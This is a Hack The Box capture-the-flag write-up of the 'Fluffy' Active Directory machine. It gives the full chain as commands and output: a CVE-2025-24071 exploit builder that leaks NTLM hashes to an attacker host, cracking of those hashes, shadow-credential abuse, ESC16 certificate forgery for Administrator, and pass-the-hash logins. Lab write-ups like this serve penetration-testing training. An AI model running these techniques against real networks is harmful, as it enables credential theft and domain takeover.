HTB Writeup: Fluffy

First AD machine has been solved - more knowledge.

Prepare

Machine Information

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman : J0elTHEM4n1990!

Scanning Service with nmap

binary@parrot > ~ > Desktop >
⚡ nmap -sV -Pn -sC 10.10.11.69 -oA nmap/fluffy
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-17 01:27 +07
Nmap scan report for 10.10.11.69
Host is up (0.048s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-17 01:02:07Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T01:03:29+00:00; +6h34m07s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T01:03:28+00:00; +6h34m06s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T01:03:29+00:00; +6h34m07s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-17T01:03:28+00:00; +6h34m06s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-09-17T01:02:50
|_  start_date: N/A
|_clock-skew: mean: 6h34m06s, deviation: 0s, median: 6h34m05s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.82 seconds

From the nmap output we can see the target has the following ports open. Note also the clock skew nmap reports (about +6h34m against our scanner, visible in the ssl-date and clock-skew lines): Kerberos tolerates only a few minutes of skew, so this will bite later unless we sync our clock to the target.

53/tcp - DNS
139/tcp + 445/tcp = SMB
-------------------------------------
88/tcp - Kerberos
464/tcp - Kerberos password change (kpasswd)
-------------------------------------
593/tcp - RPC over HTTP (ncacn_http)
-------------------------------------
389/tcp - LDAP (unencrypted)
636/tcp - LDAP over SSL/TLS (LDAPS)
3268/tcp + 3269/tcp = Global Catalog LDAP / LDAPS (used to query objects across the whole forest)

DNS, Kerberos, LDAP, a Global Catalog and SMB on a host named DC01 with certificates issued for DC01.fluffy.htb: the target is the Domain Controller for fluffy.htb.

(Optional) First, add fluffy.htb (and DC01.fluffy.htb, which the later tools target) to /etc/hosts so the names resolve to 10.10.11.69.

The machine gives us one domain credential to access the target. With no RDP exposed, the natural first place to use it is SMB (Server Message Block).

SMB Enumeration

To enumerate SMB we can use smbclient or smbmap (recommended, since it also shows our permissions per share) to list shares and files:

binary@parrot > ~ > Desktop >
⚡ smbclient -L //10.10.11.69 -U 'FLUFFY\\j.fleischman%J0elTHEM4n1990!'

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	IT              Disk      
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.69 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

binary@parrot > ~ > Desktop >
⚡ smbmap -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d 'fluffy.htb' -H 10.10.11.69
[+] IP: 10.10.11.69:445	Name: DC01.fluffy.htb                                   
    Disk                    Permissions	Comment
	----                    -----------	-------
	ADMIN$                  NO ACCESS	Remote Admin
	C$                      NO ACCESS	Default share
	IPC$                    READ ONLY	Remote IPC
	IT                      READ, WRITE	
	NETLOGON                READ ONLY	Logon server share 
	SYSVOL                  READ ONLY	Logon server share 

The NT_STATUS_RESOURCE_NAME_NOT_FOUND error is nothing to worry about: the server has SMBv1 disabled, so smbclient's SMB1 fallback for the workgroup listing simply fails.

The IT share is READ, WRITE for our user (a writable share is always worth noting: whatever we drop there may be opened by whoever else uses it). Let's look inside.

binary@parrot > ~ > Desktop >
⚡ smbclient //10.10.11.69/IT -U 'FLUFFY\\j.fleischman'
Password for [j.fleischman]: J0elTHEM4n1990!
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon May 19 21:27:02 2025
  ..                                  D        0  Mon May 19 21:27:02 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 22:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 22:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 22:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 22:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 21:31:07 2025

		5842943 blocks of size 4096. 1521262 blocks available

After enumerating the share we find two pieces of software, KeePass 2.58 and Everything 1.4.1.1026, plus a file Upgrade_Notice.pdf.

Reading the PDF, it is a notice asking the admins to upgrade the system:

(image: Upgrade_Notice.pdf, listing the CVEs below)

So there is a good chance the system is still affected by these:

CVE-2025-24996   Critical   NTLM
CVE-2025-24071   Critical   NTLM
CVE-2025-46785   High       Zoom
CVE-2025-29968   High       AD CS
CVE-2025-21193   Medium     AD
CVE-2025-3445    Low        Zip file


Of those, only one has a public PoC: CVE-2025-24071, where Windows Explorer leaks the user's NTLM hash when a malicious .library-ms file is extracted from a ZIP archive. The library file points at a UNC path on the attacker's host; when Explorer processes the extracted file it connects to that path and authenticates with NTLM, which we capture. The PoC's .library-ms template is:

<?xml version="1.0" encoding="UTF-8"?>
<!-- Template as it appears inside the PoC's Python source: {args.ip_address} and the
     doubled backslashes are f-string/escape syntax. The file written to disk contains
     \\<attacker-ip>\shared, the UNC path Explorer will authenticate to. -->
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{args.ip_address}\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

CVE-2025-24071 Exploit

Use the exploit script to build the ZIP, upload it to the writable IT share (smbclient put), and have Responder listening on the VPN interface. Within a few seconds something on the target extracts the archive, Explorer follows the UNC path to our host, and Responder captures the NetNTLMv2 hash of the user who did it.
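As an added example that is not part of the original post or of the PoC script used above, the following Python builds the same trigger the PoC does: a .library-ms whose simpleLocation url is a UNC path on our host, packed into a ZIP, plus a small reverse check that lists every UNC target referenced by .library-ms entries inside a ZIP (useful for inspecting what gets dropped onto a writable share like IT). The attacker address 10.10.14.125 is assumed to be the Responder listener, and the entry name Upgrade.library-ms is an arbitrary choice.

```python
"""Build the CVE-2025-24071 trigger: a .library-ms with an attacker UNC path, inside a ZIP."""
import io
import zipfile
import xml.etree.ElementTree as ET

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"


def build_library_ms(attacker_ip: str, share: str = "shared") -> str:
    """Return the .library-ms XML. Explorer resolves the UNC path in <url> when it
    handles the extracted file, which is what makes the victim authenticate to us."""
    unc = f"\\\\{attacker_ip}\\{share}"
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<libraryDescription xmlns="{LIBRARY_NS}">\n'
        "  <searchConnectorDescriptionList>\n"
        "    <searchConnectorDescription>\n"
        "      <simpleLocation>\n"
        f"        <url>{unc}</url>\n"
        "      </simpleLocation>\n"
        "    </searchConnectorDescription>\n"
        "  </searchConnectorDescriptionList>\n"
        "</libraryDescription>\n"
    )


def build_zip(attacker_ip: str, entry_name: str = "Upgrade.library-ms") -> bytes:
    """Return the bytes of a ZIP holding a single .library-ms entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, build_library_ms(attacker_ip))
    return buf.getvalue()


def zip_entries(data: bytes) -> list[str]:
    """Entry names inside a ZIP given as bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def unc_targets_in_zip(data: bytes) -> list[str]:
    """Defender-side check: every UNC path referenced by .library-ms entries in a ZIP.
    Run this over archives that appear on a writable share before anyone opens them."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            root = ET.fromstring(zf.read(name))
            for url in root.iter(f"{{{LIBRARY_NS}}}url"):
                if url.text and url.text.startswith("\\\\"):
                    found.append(url.text)
    return found


if __name__ == "__main__":
    # Assumption: 10.10.14.125 is the VPN address where Responder is listening.
    payload = build_zip("10.10.14.125")
    with open("exploit.zip", "wb") as fh:
        fh.write(payload)
    print(zip_entries(payload), unc_targets_in_zip(payload))
```

Upload the resulting exploit.zip to the IT share and keep Responder running on the same interface as the address you put in the UNC path; the reverse check is the quick way to confirm the archive actually carries the path you intended.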

(animation: building the ZIP, uploading it to the IT share, and Responder catching the hash)

Once the exploit fires we have a leaked NetNTLMv2 hash. Crack it to get the password:

binary@parrot > ~ > Desktop > exploits > CVE-2025-24071_PoC
⚡ hashid hash.txt 
--File 'hash.txt'--
Analyzing 'p.agila::FLUFFY:c21407215ee483dd...'
[+] NetNTLMv2 
--End of file 'hash.txt'--

⚡ hashcat -m 5600 -a 0 hash.txt /home/binary/Desktop/rockyou.txt 
hashcat (v6.2.6) starting
...

P.AGILA::FLUFFY:c21407215ee483dd:74a72319ab3b931190188e973376ab27:0101000000000000805e86893328dc014222e4b4a1beb77d00000000020008003700590039004e0001001e00570049004e002d004c00420037003400550036004600510049003500500004003400570049004e002d004c0042003700340055003600460051004900350050002e003700590039004e002e004c004f00430041004c00030014003700590039004e002e004c004f00430041004c00050014003700590039004e002e004c004f00430041004c0007000800805e86893328dc0106000400020000000800300030000000000000000100000000200000c54d39ae29359ce4ba05d0fce8f8b4c17819117f41d5fd5651e02263d2066c330a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100320035000000000000000000:prometheusx-303
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: P.AGILA::FLUFFY:c21407215ee483dd:74a72319ab3b931190...000000
Time.Started.....: Thu Sep 18 00:49:29 2025 (2 secs)
Time.Estimated...: Thu Sep 18 00:49:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/binary/Desktop/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2600.3 kH/s (0.93ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4520448/14344384 (31.51%)
Rejected.........: 0/4520448 (0.00%)
Restore.Point....: 4515840/14344384 (31.48%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: prored -> priyankashah
Hardware.Mon.#1..: Util: 25%

OK, so we now have a second credential:

p.agila - prometheusx-303
j.fleischman - J0elTHEM4n1990!

AD Relationship Enumeration

Next we enumerate the relationships, accounts, groups and so on in the AD environment with bloodhound.py and export a zip to feed into BloodHound. One caveat visible in the first line of the collector's output: this build targets BloodHound Legacy (4.2/4.3); for BloodHound CE use the CE build of the collector, since the two ingest formats are not interchangeable.

binary@parrot > ~ > Desktop > more_tools > BloodHound.py
⚡ python3 bloodhound.py -u 'j.fleischman' -p 'J0elTHEM4n1990!' -d 'fluffy.htb' -ns '10.10.11.69' -c 'All' --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::9691:a075:a64c:9a5e
INFO: Trying LDAP connection to dead:beef::9691:a075:a64c:9a5e
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Testing resolved hostname connectivity dead:beef::9691:a075:a64c:9a5e
INFO: Trying LDAP connection to dead:beef::9691:a075:a64c:9a5e
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20250918215942_bloodhound.zip

Looking at the graph, only P.Agila and J.Coffey are members of Service Account Managers; we hold only P.Agila's credential, so that is the one we go deeper with. (The KRB_AP_ERR_SKEW warning in the collector output is the same ~6h34m clock skew nmap reported; the collector fell back to NTLM, but the Kerberos-only steps later will need the clock fixed.)

Service Account Managers has GenericAll over the Service Accounts group.

And Service Accounts in turn has GenericWrite over three service accounts (SVC is short for service): CA_SVC (the Certificate Authority service account), LDAP_SVC and WINRM_SVC (WinRM).

So the chain is:

(P.AGILA member of Service Account Managers) -GenericAll-> Service Accounts -GenericWrite-> CA_SVC, LDAP_SVC, WINRM_SVC

=> P.Agila indirectly controls those service accounts. To exercise that control directly we add P.Agila to the Service Accounts group ourselves (GenericAll on a group includes the right to write its member attribute).

Explanation: three concepts you will see constantly in BloodHound:

  • MemberOf: plain group membership (A is a member of B)
  • Inbound Object Control: which other objects have control over A
  • Outbound Object Control: A holds rights on B's ACL (Access Control List) sufficient to take over B (GenericAll, WriteDACL, WriteOwner, AddMember/WriteProperty on the member attribute, AllExtendedRights, ...)
    • ACL: an ordered set of Access Control Entries (ACEs) applied to an object.

Privilege Escalation

We use bloodyAD for this (it manages group membership, edits ACLs, adds/changes SPNs, resets user/service-account passwords and reads/writes related attributes over LDAP wherever the ACL allows it, without needing PowerShell/WinRM/SMB):

binary@parrot > ~ > Desktop > more_tools > bloodyAD
⚡ bloodyAD --host '10.10.11.69' -d 'dc01.fluffy.htb' -u 'p.agila' -p 'prometheusx-303'  add groupMember 'SERVICE ACCOUNTS' p.agila
[+] p.agila added to SERVICE ACCOUNTS

After adding P.Agila to Service Accounts we need to sync our clock with the target, otherwise Kerberos will reject the authentication when we go deeper with certipy (the PKINIT/TGT steps below are Kerberos-only, with no NTLM fallback):

sudo ntpdate -u 10.10.11.69
2025-09-19 16:08:44.436920 (+0700) +23644.483927 +/- 0.025399 10.10.11.69 s1 no-leap
CLOCK: time stepped by 23644.483927

Certipy is an AD CS (Active Directory Certificate Services) assessment tool: it finds and exploits CA/template misconfigurations for privilege escalation, authenticates with certificates (PKINIT/Schannel), bypasses MFA/lockout and can take over the domain. Here we use its shadow credentials attack to obtain a TGT and NT hash for WINRM_SVC: with GenericWrite on the account (inherited through Service Accounts) we write a new key credential into its msDS-KeyCredentialLink, authenticate with the matching certificate via PKINIT, recover the NT hash through Kerberos U2U, and certipy restores the original key credentials afterwards. This relies on PKINIT being available on the DC, which the AD CS deployment here provides.

binary@parrot > ~ > Desktop > more_tools
⚡ certipy shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'WINRM_SVC' -dc-ip '10.10.11.69'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'a127884b-2ade-5bce-5f4d-1b89c0689e09'
[*] Adding Key Credential with device ID 'a127884b-2ade-5bce-5f4d-1b89c0689e09' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'a127884b-2ade-5bce-5f4d-1b89c0689e09' to the Key Credentials for 'winrm_svc'
/home/binary/Desktop/more_tools/certipy-ad/lib/python3.11/site-packages/certipy/lib/certificate.py:233: CryptographyDeprecationWarning: Parsed a serial number which wasn't positive (i.e., it was negative or zero), which is disallowed by RFC 5280. Loading this certificate will cause an exception in a future release of cryptography.
  return x509.load_der_x509_certificate(certificate)
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 33bd09dcd697600edf6b3a7af4875767

User Flag

With the NT hash we can pass-the-hash straight into winrm_svc over WinRM:

⚡ evil-winrm -H 33bd09dcd697600edf6b3a7af4875767 -i 10.10.11.69 -u 'winrm_svc'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> type ..\Desktop\user.txt
<<REDACTED>>

Check whether we can read the flag in Administrator's profile:

*Evil-WinRM* PS C:\Users\Administrator> dir
Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ dir
+ ~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

CA_SVC Vulnerability Exploit and Access to Administrator

None of the accounts in the ACL chain, nor any other user we know of, is a Domain Admin, so we need to escalate further.

In the ACL we have GenericWrite over CA_SVC (the Certificate Authority service account), so let's check whether AD CS itself is misconfigured.

First, get CA_SVC's NT hash the same way (shadow credentials) so we can authenticate as it:

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy shadow auto -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'CA_SVC' -dc-ip '10.10.11.69'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '189f69902f8b4f5e95f5795ceb14b6a9'
[*] Adding Key Credential with device ID '189f69902f8b4f5e95f5795ceb14b6a9' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '189f69902f8b4f5e95f5795ceb14b6a9' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

With the hash we look for vulnerabilities/misconfigurations in AD CS using certipy (note: to get a current certipy working, update Python first, 3.12.6 at the time of writing, then install certipy-ad).

The Certipy wiki describes the ESC1 to ESC16 escalation techniques for AD CS that this check covers: certipy-wiki
When run with -vulnerable, certipy reports which of them apply to the CA and its templates:

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy find -vulnerable -u CA_SVC -hashes ":ca0f4f9e9eb8a092addf53bb03fc98c8" -dc-ip 10.10.11.69
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 14 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
[*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250919220428_Certipy.txt'
[*] Wrote text output to '20250919220428_Certipy.txt'
[*] Saving JSON output to '20250919220428_Certipy.json'
[*] Wrote JSON output to '20250919220428_Certipy.json'

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ cat 20250919220428_Certipy.txt
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC16                             : Security Extension is disabled.
    [*] Remarks
      ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates                   : [!] Could not find any certificate templates

The scan shows the CA is vulnerable to ESC16: the security extension (OID 1.3.6.1.4.1.311.25.2, szOID_NTDS_CA_SECURITY_EXT, shown under Disabled Extensions) is disabled CA-wide, so issued certificates carry no SID and the DC has to map them to accounts by UPN alone. To exploit it we first set the UPN of an account we can write (ca_svc) to the target privileged account's sAMAccountName (userPrincipalName -> administrator):

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy account -u 'p.agila' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : ca_svc@fluffy.htb
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-09-19T15:07:41+00:00

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy account -u 'p.agila' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_svc'

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy account -u 'p.agila' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Reading attributes for 'ca_svc':
    cn                                  : certificate authority service
    distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    name                                : certificate authority service
    objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
    sAMAccountName                      : ca_svc
    servicePrincipalName                : ADCS/ca.fluffy.htb
    userPrincipalName                   : administrator
    userAccountControl                  : 66048
    whenCreated                         : 2025-04-17T16:07:50+00:00
    whenChanged                         : 2025-09-19T15:13:28+00:00

With ca_svc's UPN now set to administrator, the next step is to point the Kerberos credential cache environment variable at the ca_svc.ccache from the shadow credentials step and request a certificate as ca_svc. The CA copies the account's UPN into the certificate and, with the security extension disabled, adds no SID, so what we get is a certificate for administrator. The Certipy wiki gives the generic form (placeholder DC address, CA host and CA name):

export KRB5CCNAME=victim.ccache

certipy req \
    -k -dc-ip '10.0.0.100' \
    -target 'CA.CORP.LOCAL' -ca 'CORP-CA' \
    -template 'User'

On Fluffy:
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ export KRB5CCNAME=ca_svc.ccache 

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy req -k -dc-ip '10.10.11.69' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 20
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Once the certificate is issued, restore ca_svc's UPN before authenticating: if ca_svc still carried UPN administrator, the KDC would map the certificate's UPN back to ca_svc instead of the real Administrator, and leaving the account modified is poor hygiene anyway. Then authenticate with the certificate to get Administrator's TGT and NT hash:

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy account -u 'p.agila' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
binary@parrot > ~ > Desktop > more_tools > certipy
⚡ certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

Root Flag

With the NT hash (the part before the ':' is the LM hash; aad3b435b51404eeaad3b435b51404ee is the empty-LM placeholder and of no use) we use evil-winrm to log in as Administrator and grab the flag.

binary@parrot > ~ > Desktop > more_tools > certipy
⚡ evil-winrm -H '8da83a3fa618b6e3a00e93f676c92a6e' -i '10.10.11.69' -u 'Administrator'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/19/2025   6:43 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
<<REDACTED>>

Done!

Solved

Happy hacking

This post is licensed under CC BY 4.0 by the author.